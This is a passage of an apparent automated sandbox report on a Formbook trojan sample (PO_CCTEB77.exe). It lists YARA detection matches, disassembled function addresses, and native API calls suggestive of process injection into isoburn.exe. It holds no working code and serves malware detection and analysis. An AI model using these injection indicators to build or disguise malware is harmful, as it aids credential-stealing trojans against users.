            Source: 00000004.00000002.4475055510.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2155764463.0000000002560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0315E0240_2_0315E024
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_06520B000_2_06520B00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_065200400_2_06520040
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_065200060_2_06520006
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_06521FF00_2_06521FF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_079737D80_2_079737D8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_079747E00_2_079747E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_079743680_2_07974368
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_079747D10_2_079747D1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_079737C80_2_079737C8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0797168B0_2_0797168B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_079716B80_2_079716B8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0797435A0_2_0797435A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0797321A0_2_0797321A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_079732280_2_07973228
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0797DF000_2_0797DF00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834A0780_2_0834A078
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834E9F80_2_0834E9F8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834E5F80_2_0834E5F8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_08348DC00_2_08348DC0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834EF300_2_0834EF30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834AF580_2_0834AF58
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834C8780_2_0834C878
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834F8780_2_0834F878
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834E06F0_2_0834E06F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834A0690_2_0834A069
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834F8690_2_0834F869
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834C86A0_2_0834C86A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834D0E80_2_0834D0E8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834D0D80_2_0834D0D8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_083481980_2_08348198
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834E9990_2_0834E999
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834E9840_2_0834E984
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834818A0_2_0834818A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834D3780_2_0834D378
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834D3690_2_0834D369
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_08348D3F0_2_08348D3F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834D5700_2_0834D570
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834D5610_2_0834D561
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834E5E80_2_0834E5E8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834CEB00_2_0834CEB0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834CEA10_2_0834CEA1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834AEFA0_2_0834AEFA
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 0_2_0834EF200_2_0834EF20
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004010003_2_00401000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040280B3_2_0040280B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004028103_2_00402810
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040112B3_2_0040112B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004011303_2_00401130
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004101333_2_00410133
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040E1B33_2_0040E1B3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004012803_2_00401280
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00402BC93_2_00402BC9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00402C403_2_00402C40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004164433_2_00416443
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00402C3D3_2_00402C3D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0041643E3_2_0041643E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_004025203_2_00402520
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040FF0A3_2_0040FF0A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040FF133_2_0040FF13
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00402FC03_2_00402FC0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0042A7E33_2_0042A7E3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018901AA3_2_018901AA
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018881CC3_2_018881CC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C01003_2_017C0100
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186A1183_2_0186A118
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018581583_2_01858158
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018620003_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018903E63_2_018903E6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE3F03_2_017DE3F0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188A3523_2_0188A352
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018502C03_2_018502C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018702743_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018905913_2_01890591
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D05353_2_017D0535
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0187E4F63_2_0187E4F6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018824463_2_01882446
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D07703_2_017D0770
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F47503_2_017F4750
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CC7C03_2_017CC7C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EC6E03_2_017EC6E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E69623_2_017E6962
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0189A9A63_2_0189A9A6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D29A03_2_017D29A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D28403_2_017D2840
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DA8403_2_017DA840
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE8F03_2_017FE8F0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B68B83_2_017B68B8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01886BD73_2_01886BD7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188AB403_2_0188AB40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CEA803_2_017CEA80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DAD003_2_017DAD00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CADE03_2_017CADE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E8DBF3_2_017E8DBF
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870CB53_2_01870CB5
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0C003_2_017D0C00
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C0CF23_2_017C0CF2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184EFA03_2_0184EFA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F0F303_2_017F0F30
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DCFE03_2_017DCFE0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01812F283_2_01812F28
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C2FC83_2_017C2FC8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01844F403_2_01844F40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188CE933_2_0188CE93
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0E593_2_017D0E59
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188EEDB3_2_0188EEDB
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188EE263_2_0188EE26
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E2E903_2_017E2E90
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BF1723_2_017BF172
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DB1B03_2_017DB1B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0189B16B3_2_0189B16B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180516C3_2_0180516C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0187F0CC3_2_0187F0CC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018870E93_2_018870E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188F0E03_2_0188F0E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D70C03_2_017D70C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0181739A3_2_0181739A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BD34C3_2_017BD34C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188132D3_2_0188132D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018712ED3_2_018712ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EB2C03_2_017EB2C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D52A03_2_017D52A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186D5B03_2_0186D5B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018875713_2_01887571
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C14603_2_017C1460
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188F43F3_2_0188F43F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188F7B03_2_0188F7B0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018816CC3_2_018816CC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D99503_2_017D9950
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EB9503_2_017EB950
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018659103_2_01865910
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183D8003_2_0183D800
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D38E03_2_017D38E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01845BF03_2_01845BF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0180DBF93_2_0180DBF9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FB763_2_0188FB76
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EFB803_2_017EFB80
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01815AA03_2_01815AA0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186DAAC3_2_0186DAAC
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0187DAC63_2_0187DAC6
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FA493_2_0188FA49
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01887A463_2_01887A46
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01843A6C3_2_01843A6C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D3D403_2_017D3D40
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EFDC03_2_017EFDC0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01881D5A3_2_01881D5A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01887D733_2_01887D73
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FCF23_2_0188FCF2
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01849C323_2_01849C32
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FFB13_2_0188FFB1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188FF093_2_0188FF09
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D1F923_2_017D1F92
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D9EB03_2_017D9EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B05355_2_050B0535
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051705915_2_05170591
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051544205_2_05154420
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051624465_2_05162446
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0515E4F65_2_0515E4F6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050D47505_2_050D4750
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B07705_2_050B0770
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050AC7C05_2_050AC7C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CC6E05_2_050CC6E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A01005_2_050A0100
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514A1185_2_0514A118
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051381585_2_05138158
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051701AA5_2_051701AA
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051681CC5_2_051681CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051420005_2_05142000
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516A3525_2_0516A352
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051703E65_2_051703E6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BE3F05_2_050BE3F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051502745_2_05150274
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051302C05_2_051302C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BAD005_2_050BAD00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514CD1F5_2_0514CD1F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050C8DBF5_2_050C8DBF
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050AADE05_2_050AADE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B0C005_2_050B0C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05150CB55_2_05150CB5
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A0CF25_2_050A0CF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05152F305_2_05152F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050F2F285_2_050F2F28
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050D0F305_2_050D0F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05124F405_2_05124F40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0512EFA05_2_0512EFA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A2FC85_2_050A2FC8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BCFE05_2_050BCFE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516EE265_2_0516EE26
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B0E595_2_050B0E59
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516CE935_2_0516CE93
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050C2E905_2_050C2E90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516EEDB5_2_0516EEDB
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050C69625_2_050C6962
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B29A05_2_050B29A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0517A9A65_2_0517A9A6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BA8405_2_050BA840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B28405_2_050B2840
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050968B85_2_050968B8
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050DE8F05_2_050DE8F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516AB405_2_0516AB40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05166BD75_2_05166BD7
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050AEA805_2_050AEA80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051675715_2_05167571
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514D5B05_2_0514D5B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516F43F5_2_0516F43F
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050A14605_2_050A1460
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516F7B05_2_0516F7B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051616CC5_2_051616CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050E516C5_2_050E516C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0509F1725_2_0509F172
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0517B16B5_2_0517B16B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050BB1B05_2_050BB1B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B70C05_2_050B70C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0515F0CC5_2_0515F0CC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516F0E05_2_0516F0E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051670E95_2_051670E9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516132D5_2_0516132D
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0509D34C5_2_0509D34C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050F739A5_2_050F739A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B52A05_2_050B52A0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CB2C05_2_050CB2C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051512ED5_2_051512ED
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B3D405_2_050B3D40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05161D5A5_2_05161D5A
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05167D735_2_05167D73
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CFDC05_2_050CFDC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05129C325_2_05129C32
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FCF25_2_0516FCF2
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FF095_2_0516FF09
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B1F925_2_050B1F92
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FFB15_2_0516FFB1
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B9EB05_2_050B9EB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_051459105_2_05145910
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B99505_2_050B9950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CB9505_2_050CB950
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0511D8005_2_0511D800
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050B38E05_2_050B38E0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FB765_2_0516FB76
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050CFB805_2_050CFB80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05125BF05_2_05125BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050EDBF95_2_050EDBF9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05167A465_2_05167A46
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0516FA495_2_0516FA49
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05123A6C5_2_05123A6C
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_050F5AA05_2_050F5AA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_05151AA35_2_05151AA3
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0514DAAC5_2_0514DAAC
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0515DAC65_2_0515DAC6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_03011A105_2_03011A10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300CE605_2_0300CE60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300AEE05_2_0300AEE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300CC375_2_0300CC37
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0300CC405_2_0300CC40
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0301316B5_2_0301316B
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030131705_2_03013170
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_030275105_2_03027510
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 017BB970 appears 275 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 01817E54 appears 100 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 01805130 appears 56 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 0183EA12 appears 86 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: String function: 0184F290 appears 105 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0509B970 appears 278 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 050E5130 appears 58 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0511EA12 appears 86 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 0512F290 appears 105 times
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: String function: 050F7E54 appears 102 times
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A953 NtMapViewOfSection,3_2_0040A953
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A123 NtSetContextThread,3_2_0040A123
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040B213 NtDelayExecution,3_2_0040B213
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040AB73 NtCreateFile,3_2_0040AB73
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A323 NtResumeThread,3_2_0040A323
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00428453 NtClose,3_2_00428453
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00409D23 NtSuspendThread,3_2_00409D23
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040ADA3 NtReadFile,3_2_0040ADA3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040B623 NtAllocateVirtualMemory,3_2_0040B623
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_00409F23 NtGetContextThread,3_2_00409F23
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0040A733 NtCreateSection,3_2_0040A733
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802B60 NtClose,LdrInitializeThunk,3_2_01802B60
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_01802DF0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_01802C70
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018035C0 NtCreateMutant,LdrInitializeThunk,3_2_018035C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01804340 NtSetContextThread,3_2_01804340
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01804650 NtSuspendThread,3_2_01804650
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01802B80 NtQueryInformationFile,3_2_01802B80
